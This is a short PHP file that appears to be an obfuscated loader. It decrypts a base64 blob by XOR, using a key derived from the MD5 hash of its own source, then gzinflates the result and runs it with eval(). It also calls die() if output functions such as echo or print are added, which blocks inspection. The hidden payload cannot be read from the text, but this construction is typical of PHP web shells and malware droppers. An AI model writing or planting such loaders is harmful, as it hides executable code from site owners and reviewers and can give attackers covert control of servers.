<?php
$zlspqiq="9d614f6bfd3dc5b50f25563b50e73d47";
$wbezwemys="010105575251575254020a535153060c5502510d5752520703090405055c0454";
$zqwskxie="RfTiDaQHcfbN87YVhmifDZNWMki4VSB0nBYzd4Te5COr8xd76taejvbQokxCKYXXnrm+T3WhRfy83OV7Y9WWxorfH2y0Udb+B/cLjL8ApqNEyBwJgzbJ8ZxrOoEaAdForXMsqnS51PqfTix5VgnVINZIiQPSw/gqSlvlXglMUcCD1VSppPMCzizptlPBlcARR2CIXPMoVh32UttolJtnihQswtTjIvMAebBqG9StnT/qK2LCIXgqKBoGQsjf93xUkxQS3nnuBYJilsldlJfyQByLfvpJfOw03bsy3EC1zrfMYjvL1jK8syiXrgw6ryrGtkmx7qpih4uOaNG/U/TBlRTnMgjsUyqDccvlAO+NuvD7EbhmvlEMyCOL0e/NYuh+2S9v2Gc=";
$ywupnsdqd=file_get_contents(__FILE__);
$jswwtzxo=str_replace($zqwskxie,"",$ywupnsdqd);
if(strpos($jswwtzxo,"ec"."ho")!==false||strpos($jswwtzxo,"pr"."int")!==false||strpos($jswwtzxo,"var_"."dump")!==false||strpos($jswwtzxo,"file_put_"."contents")!==false||strpos($jswwtzxo,"fw"."rite")!==false){die();}
$jsztsmohhm=str_replace(array($zlspqiq,$wbezwemys),array("SP_dfc6b937","KP_cfc29047"),$ywupnsdqd);
$baqvrqppagjl=md5($jsztsmohhm);
$bljdqikoqfyr=hex2bin($wbezwemys);
$ibnflfuvjw="";
$rcmqmkwufnte=strlen($baqvrqppagjl);
for($rmirbe=0;$rmirbe<$rcmqmkwufnte;$rmirbe++){
    $ibnflfuvjw.=chr(ord($bljdqikoqfyr[$rmirbe])^ord($baqvrqppagjl[$rmirbe]));
}
$ojjuugair=base64_decode($zqwskxie);
$sijkuqnf=strlen($ojjuugair);
$vewljbzhwu="";
$iwlhdxb=strlen($ibnflfuvjw);
for($rmirbe=0;$rmirbe<$sijkuqnf;$rmirbe++){
    $vewljbzhwu.=$ojjuugair[$rmirbe]^$ibnflfuvjw[$rmirbe%$iwlhdxb];
}
$uwtqunzrwst="gz"."in"."fl"."ate";
eval($uwtqunzrwst($vewljbzhwu));
